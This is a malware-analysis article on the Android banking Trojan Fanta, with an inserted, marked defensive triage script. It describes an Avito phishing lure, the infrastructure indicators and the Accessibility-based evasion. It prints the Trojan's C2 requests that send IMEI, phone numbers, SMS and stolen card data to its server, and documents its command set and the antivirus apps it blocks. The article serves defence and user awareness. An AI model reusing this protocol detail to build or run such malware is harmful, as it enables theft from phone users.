Leisya, Fanta: a new tactic of an old Android Trojan

One day you decide to sell something on Avito and, having posted a detailed description of your item (say, a RAM module), you receive this message:

As soon as you open the link, you see a harmless-looking page telling you that the buyer, pleased and satisfied, has already made the purchase:

After you tap the "Continue" button, an APK file with an icon and a name that inspire trust is downloaded to your Android device. You install the application, which for some reason asks for AccessibilityService permission, then a couple of windows appear and quickly disappear and ... that's it.

You go to check your balance, but for some reason your banking app asks for your card details again. After you enter the data, something terrible happens: for reasons still unclear to you, money starts leaving your account. You try to fix the problem, but your phone resists: it presses the "Back" and "Home" keys on its own, will not switch off and will not let you take any protective action. As a result, you are left without money, your item has not been bought, and you are confused and wondering: what happened?

The answer is simple: you have become a victim of the Android Trojan Fanta, a member of the Flexnet family. How did this happen? Let us explain.

Authors: Andrey Polovinkin, junior malware analyst, and Ivan Pisarev, malware analyst.

Some statistics

The Flexnet family of Android Trojans first became known in 2015. Over its long period of activity the family has grown into several subspecies: Fanta, Limebot, Lipton, etc. The Trojan, and the infrastructure associated with it, do not stand still: new, effective distribution schemes are developed (in our case, high-quality phishing pages aimed at a specific seller), and the Trojan's developers follow fashionable trends in virus writing, adding new functionality that makes it possible to steal money from infected devices more efficiently and to bypass protection mechanisms.

The campaign described in this article targets users from Russia; a small number of infected devices were recorded in Ukraine, and even in Kazakhstan and Belarus.

Although Flexnet has been in the Android Trojan arena for more than 4 years now and has been studied in detail by many researchers, it is still in good shape. Since January 2019 the potential damage is more than 35 million rubles, and that is only for campaigns in Russia. In 2015 various versions of this Android Trojan were sold on underground forums, where its source code with a detailed description could also be found. This means that the damage statistics worldwide are even more impressive. Not a bad indicator for such an old-timer, is it?


From sale to fraud

As can be seen from the screenshot shown earlier of the phishing page for the Avito classified-ads service, it was prepared for a specific victim. Apparently the attackers use one of the Avito parsers, which extracts the seller's phone number and name as well as the item description. After the page is deployed and the APK file is prepared, the victim is sent an SMS with their name and a link to the phishing page containing the description of their item and the amount received from the "sale" of the item. By pressing the button, the user receives the malicious APK file, Fanta.

Investigation of the domain shcet491[.]ru showed that it is delegated to Hostinger's DNS servers:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

The domain zone file contains entries pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243 and 31.220.23[.]235. However, the domain's primary resource record (A record) points to a server with the IP address 178.132.1[.]240.

The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the hoster WorldStream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the UK and belong to HOSTINGER servers. The registrar used was openprov-ru. The following domains also resolved to the IP address 178.132.1[.]240:


Note that for almost all of these domains the link has the following form:

http://(www.){0,1}<%domain%>/[0-9]{7}

The link from the SMS message also fits this template. Based on historical data, it was found that a single domain corresponds to several links of the form described above, which indicates that one domain was used to distribute the Trojan to several victims.

Let's jump ahead a bit: the Trojan downloaded via the link from the SMS uses the address onuseseddohap[.]club as its control server. This domain was registered on 2019-03-12, and from 2019-04-29 onwards APK applications interacted with it. According to data obtained from VirusTotal, a total of 109 applications interacted with this server. The domain itself resolved to the IP address 217.23.14[.]27, which is located in the Netherlands and belongs to the hoster WorldStream. The domains bad-racoon[.]club (since 2018-09-25) and bad-racoon[.]live (since 2018-10-25) also resolved to this IP address. More than 80 APK files interacted with the domain bad-racoon[.]club, and more than 100 with bad-racoon[.]live.

In general, the attack proceeds as follows:

[figure: general scheme of the attack]

What's under Fanta's hood?

Like many other Android Trojans, Fanta can read and send SMS messages, make USSD requests and display its own windows on top of applications (including banking ones). However, the functional arsenal of this family has grown: Fanta began to use the Accessibility Service for various purposes: reading the contents of notifications from other applications, preventing detection and preventing the Trojan from being stopped on the infected device, etc. Fanta works on all versions of Android not older than 4.4. In this article we will look more closely at the following Fanta sample:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediately after launch

Immediately after launch, the Trojan hides its icon. The application only works if the name of the infected device is not in the following list:

  • Tractor
  • Virtualbox
  • Nexus 5X (bullhead)
  • Nexus 5 (hammerhead)

This check is carried out in the Trojan's main service, MainService. On first launch, the application's configuration parameters are initialized to default values (the format in which the configuration data is stored and its meaning are discussed later), and the newly infected device is registered with the control server. An HTTP POST request with the message type register_bot and information about the infected device (Android version, IMEI, phone number, operator name and the country code in which the operator is registered) is sent to the server. The address hXXp://onuseseddohap[.]club/controller.php serves as the control server. In response, the server sends a message containing the fields bot_id, bot_pwd and server; the application stores these values as the CnC server parameters. The server parameter is optional: if the field is not received, Fanta uses the registration address, hXXp://onuseseddohap[.]club/controller.php. The ability to change the CnC address can solve two problems: distributing the load evenly among several servers (with many infected devices, the load on an unoptimized web server can be high), and switching to an alternate server if one of the CnC servers fails.

If an error occurs while sending the request, the Trojan repeats the registration process after 20 seconds.

After the device has been registered successfully, Fanta shows the user the following message:

[screenshot]

Important: the service called System Security is the Trojan's own service, and after the OK button is pressed a window with the accessibility settings of the infected device opens, where the user has to grant accessibility rights to the malicious service:

[screenshot]

As soon as the user enables the Accessibility Service, Fanta gains access to the contents of application windows and to the actions performed in them:

[screenshot]

Immediately after receiving accessibility rights, the Trojan requests administrator rights and the right to read notifications:

[screenshot]

Using the Accessibility Service, the application simulates key presses and thereby grants itself all the rights it needs.

Fanta creates several database instances (described later), which are needed to store configuration data and the information collected about the infected device during operation. To send the collected information, the Trojan creates a recurring task that unloads fields from the database and receives a command from the control server. The interval for contacting the CnC depends on the Android version: on 5.1 the interval is 10 seconds, otherwise it is 60 seconds.

To receive a command, Fanta sends a getTask request to the control server. In response, the CnC can send one of the following commands:

Code  Description
0     Send an SMS message
1     Make a phone call or a USSD command
2     Update the interval parameter
3     Update the intercept parameter
6     Update the SmsManager parameter
9     Start collecting SMS messages
11    Reset the phone to factory settings
12    Enable/disable logging of dialog box creation

Fanta collects notifications from 70 banking applications, fast payment systems and e-wallets and stores them in the database.

Storing configuration parameters

To store its configuration, Fanta uses the standard approach for the Android platform: Preferences files. The settings are saved in a file named settings. The stored parameters are described in the table below.

Name        Default value                  Possible values  Description
id          0                              Integer          Bot ID
server      hXXp://onuseseddohap[.]club/   URL              Control server address
pwd         -                              String           Server password
interval    20                             Integer          Time interval. Indicates how long the following tasks are postponed:
                                                              • sending a request for the status of a sent SMS message
                                                              • receiving a new command from the control server
intercept   all                            all/telNumber    If the field equals the string all or telNumber, a received SMS message is intercepted by the application and not shown to the user
SmsManager  0                              0/1              Enable/disable the application as the default SMS handler
readDialog  false                          True/False       Enable/disable logging of AccessibilityEvent

Fanta also uses the file SmsManager:

Name   Default value  Possible values  Description
pckg   -              String           Name of the SMS message manager in use

Interaction with the database

During its operation, the Trojan uses two databases. The database named a is used to store various information collected from the phone. The second database, named fanta.db, is used to store the settings responsible for creating the phishing windows designed to collect bank card information.

The Trojan uses database а to store the collected information and to log its own actions. The data is kept in the logs table. The following SQL query is used to create the table:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

The database contains the following information:

1. A log entry for the start of the infected device, with the message Phone turned on!

2. Notifications from applications. The message is built according to the following template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bank card data from the phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:

  • AliExpress
  • Avito
  • Google Play
  • Miscellaneous

The information is logged in the format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming/outgoing SMS messages, in the format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Information about the package that creates a dialog box, in the format:

(<%Package name%>)<%Package information%>

Example of the logs table:

[screenshot]

One of Fanta's functions is the collection of bank card information. The data is collected by creating phishing windows when banking applications are opened. The Trojan creates each phishing window only once. Information about which windows have already been shown to the user is stored in the settings table of the fanta.db database. The following SQL query is used to create the database:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All fields of the settings table are initialized to 1 by default (create the phishing window). After the user has entered their data, the value is set to 0. Examples of the settings table fields:

  • can_login - the field is responsible for showing the form when a banking application is opened
  • first_bank - not used
  • can_avito - the field is responsible for showing the form when the Avito application is opened
  • can_ali - the field is responsible for showing the form when the Aliexpress application is opened
  • can_another - the field is responsible for showing the form when any application from the following list is opened: Yula, Pandao, Drom Auto, Wallet: money and cards, Aviasales, Booking, Trivago
  • can_card - the field is responsible for showing the form when Google Play is opened

Interaction with the control server

Network interaction with the control server takes place over HTTP. For network operations, Fanta uses the popular Retrofit library. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed during registration with the server. The server's response may carry cookies. Fanta makes the following requests to the server:

  • Registration of the bot with the control server happens once, at first launch. The following data about the infected device is sent to the server:
    · cookie - cookie received from the server (the default value is an empty string)
    · mode - string, always register_bot
    · prefix - integer, always 2
    · version_sdk - the Android version, formed according to the following template: /(Avit)
    · imei - IMEI of the infected device
    · country - country code in which the operator is registered, in ISO format
    · number - phone number
    · operator - operator name

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    In response to the request, the server returns a JSON object containing the following parameters:
    · bot_id - ID of the infected device. If bot_id equals 0, Fanta repeats the request.
    · bot_pwd - password for the server.
    · server - control server address. Optional parameter. If the parameter is not specified, the address stored in the application is used.

    Example JSON object:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • Request for a command from the server. The following data is sent to the server:
    · cookie - cookie received from the server
    · bid - id of the infected device, received in response to the register_bot request
    · pwd - password for the server
    · divice_admin - field indicating whether administrator rights have been obtained. If administrator rights have been obtained, the field equals 1, otherwise 0
    · Accessibility - Accessibility Service status. If the service has been started, the value is 1, otherwise 0
    · SMSManager - indicates whether the Trojan is enabled as the default SMS application
    · screen - indicates the state of the screen. The value is set to 1 if the screen is on, otherwise 0

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depending on the command, the server may return a JSON object with different parameters:

    · Send an SMS message: the parameters contain the phone number, the text of the SMS message and the ID of the message being sent. The identifier is used when a message of type setSmsStatus is sent to the server.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": <%SMS_ID%>
       	 }
        ],
        "status":"ok"
    }

    · Make a phone call or a USSD command: the phone number or the command arrives in the response body.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Change the interval parameter.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · Change the intercept parameter.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · Change the SmsManager field.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Collect SMS messages from the infected device.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Reset the phone to factory settings:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Change the ReadDialog parameter.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Sending a message of type setSmsStatus. This request is made after the Send an SMS message command has been executed. The request looks like this:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading the database contents. One row is transferred per request. The following data is sent to the server:
    · cookie - cookie received from the server
    · mode - string, always setSaveInboxSms
    · bid - id of the infected device, received in response to the register_bot request
    · text - text of the current database record (field d of the logs table in database а)
    · number - name of the current database record (field p of the logs table in database а)
    · sms_mode - integer value (field m of the logs table in database а)

    The request looks like this:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    If the row is sent to the server successfully, it is deleted from the table. Example of the JSON object returned by the server:

    {
        "response":[],
        "status":"ok"
    }
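The C2 exchange documented in this section, together with the SMS-link template from the "From sale to fraud" section, as an added triage example (this is not code from the article or from Group-IB). It matches links against the `http://(www.){0,1}<domain>/[0-9]{7}` template, names the request types sent to controller.php with the fields the page lists for each, and decodes getTask replies using the command table; the function names are the author's own, all inputs are constructed, and nothing is contacted over the network.

```python
"""Triage helpers for Fanta C2 traffic as described on this page.

Added example code, not from the original article or the Group-IB analysis.
Sample inputs are constructed; no network traffic is generated.
"""
import json
import re
from urllib.parse import parse_qs

# Distribution-link template quoted on the page: http://(www.){0,1}<domain>/[0-9]{7}
DIST_LINK_RE = re.compile(r"^http://(?:www\.)?([a-z0-9.-]+)/[0-9]{7}$", re.I)

# getTask "mode" codes, from the command table on the page.
TASK_MODES = {
    0: "send SMS",
    1: "make a call / USSD request",
    2: "update interval parameter",
    3: "update intercept parameter",
    6: "update SmsManager parameter",
    9: "start collecting SMS",
    11: "reset to factory settings",
    12: "enable/disable dialog-box logging",
}

# Request modes the Trojan sends to controller.php and the fields each carries
# (cookie travels in the header, so it is not a body field).
REQUEST_FIELDS = {
    "register_bot": {"prefix", "version_sdk", "imei", "country", "number", "operator"},
    "getTask": {"bid", "pwd", "divice_admin", "Accessibility", "SMSManager", "screen"},
    "setSmsStatus": {"id", "status_sms"},
    "setSaveInboxSms": {"bid", "text", "number", "sms_mode"},
}


def is_fanta_dist_link(url: str, known_domains: set) -> bool:
    """True if url matches the SMS-link template and points at a known domain."""
    m = DIST_LINK_RE.match(url.strip())
    return bool(m) and m.group(1).lower() in known_domains


def classify_c2_request(body: str) -> dict:
    """Parse a controller.php POST body and name the Fanta request type.

    Returns {"mode": ..., "known": bool, "missing": [...]}, where `missing`
    lists the fields the page documents for that mode but the body lacks.
    Unknown modes are reported rather than dropped.
    """
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    mode = params.get("mode", "")
    expected = REQUEST_FIELDS.get(mode)
    if expected is None:
        return {"mode": mode, "known": False, "missing": []}
    return {"mode": mode, "known": True, "missing": sorted(expected - set(params))}


def decode_tasks(resp: str) -> list:
    """Turn a getTask JSON reply into (mode, description, args) tuples.

    Field names are matched exactly: the "divice_admin" typo and the mixed-case
    "Accessibility"/"SMSManager" keys are part of what distinguishes this traffic.
    """
    doc = json.loads(resp)
    out = []
    for task in doc.get("response", []):
        mode = int(task.get("mode", -1))
        args = {k: v for k, v in task.items() if k != "mode"}
        out.append((mode, TASK_MODES.get(mode, "unknown command"), args))
    return out
```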

Interaction with the Accessibility Service

AccessibilityService was implemented to make Android devices easier to use for people with disabilities. In most cases, physical interaction is required to work with an application; the Accessibility Service makes it possible to do this programmatically. Fanta uses the service to create fake windows in banking applications and to prevent the user from opening system settings and certain applications.

Using the AccessibilityService functionality, the Trojan monitors changes to the elements on the screen of the infected device. As described earlier, the Fanta settings contain a parameter responsible for logging actions with dialog boxes: readDialog. If this parameter is set, information about the title and description of the package that triggered the event is added to the database. The Trojan performs the following actions when an event is triggered:

  • It simulates pressing the Back and Home keys in the following cases:
    · if the user wants to restart the device
    · if the user wants to uninstall the "Avito" application or change its access rights
    · if the name of the "Avito" application is present on the page
    · when the Google Play Protect application is opened
    · when the Accessibility Service settings page is opened
    · when the System Security dialog box appears
    · when the "Draw over other apps" settings page is opened
    · when the pages "Applications", "Backup and reset", "Data reset", "Reset settings", "Developer panel", "Special. features", "Special features", "Special rights" are opened
    · if the event was generated by one of certain applications.

    Application list

    • android
    • Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu Application Permission Management
    • MIUI Security
    • Clean Master - Antivirus & Cache Cleaner
    • Parental Control and GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & free protection 2019
    • MegaFon Mobile Security
    • AVG Protection for Xperia
    • Mobile Security
    • Malwarebytes antivirus & protection
    • Antivirus for Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus for Huawei tablet system manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • dr.web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Security Protection
    • Kaspersky Internet Security: Antivirus and Protection
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - protection and management
    • AVG Antivirus free 2019 - Protection for Android
    • Android Antivirus
    • Norton Mobile Security and Antivirus
    • Antivirus, firewall, VPN, mobile security
    • Mobile Security: antivirus, VPN, theft protection
    • Antivirus for Android

  • If permission is requested when an SMS message is sent to a short number, Fanta simulates ticking the Remember choice checkbox and pressing the Send button.
  • When an attempt is made to revoke the Trojan's administrator rights, it locks the phone screen.
  • It prevents new device administrators from being added.
  • If the dr.web antivirus application detects a threat, Fanta simulates pressing the Ignore button.
  • The Trojan simulates pressing the Back and Home buttons if the event was generated by the Samsung Device Care application.
  • Fanta creates phishing windows with forms for entering bank card information if an application from a list of about 30 different Internet services is launched. Among them: AliExpress, Booking, Avito, the Google Play Market component, Pandao, Drom Auto, etc.

    Phishing forms

    Fanta analyzes the applications running on the infected device. If an application of interest is opened, the Trojan displays a phishing window on top of all others: a form for entering bank card information. The user has to enter the following data:

    • Card number
    • Card expiry date
    • CVV
    • Cardholder name (not for all banks)

    Depending on the running application, different phishing windows are shown. Below are some examples:

    AliExpress:

    [screenshot]

    Avito:

    [screenshot]

    For some other applications, e.g. Google Play Market, Aviasales, Pandao, Booking, Trivago:

    [screenshot]

    How it actually was

    Fortunately, the person who received the SMS message described at the beginning of the article turned out to be a cybersecurity specialist. So the real, non-dramatized version differs from the one told earlier: a person received an interesting SMS and then passed it on to the Group-IB Threat Hunting Intelligence team. The result of the attack is this article. Happy ending, right? However, not all stories end so well, and so that yours does not turn into the dramatized version with the money gone, in most cases it is enough to follow the rules that have long been described:

    • do not install applications for Android OS from any source other than Google Play
    • when installing an application, pay special attention to the rights the application requests
    • pay attention to the extensions of downloaded files
    • install Android OS updates regularly
    • do not visit suspicious resources and do not download files from them
    • do not click on links received in SMS messages.

Source: www.habr.com
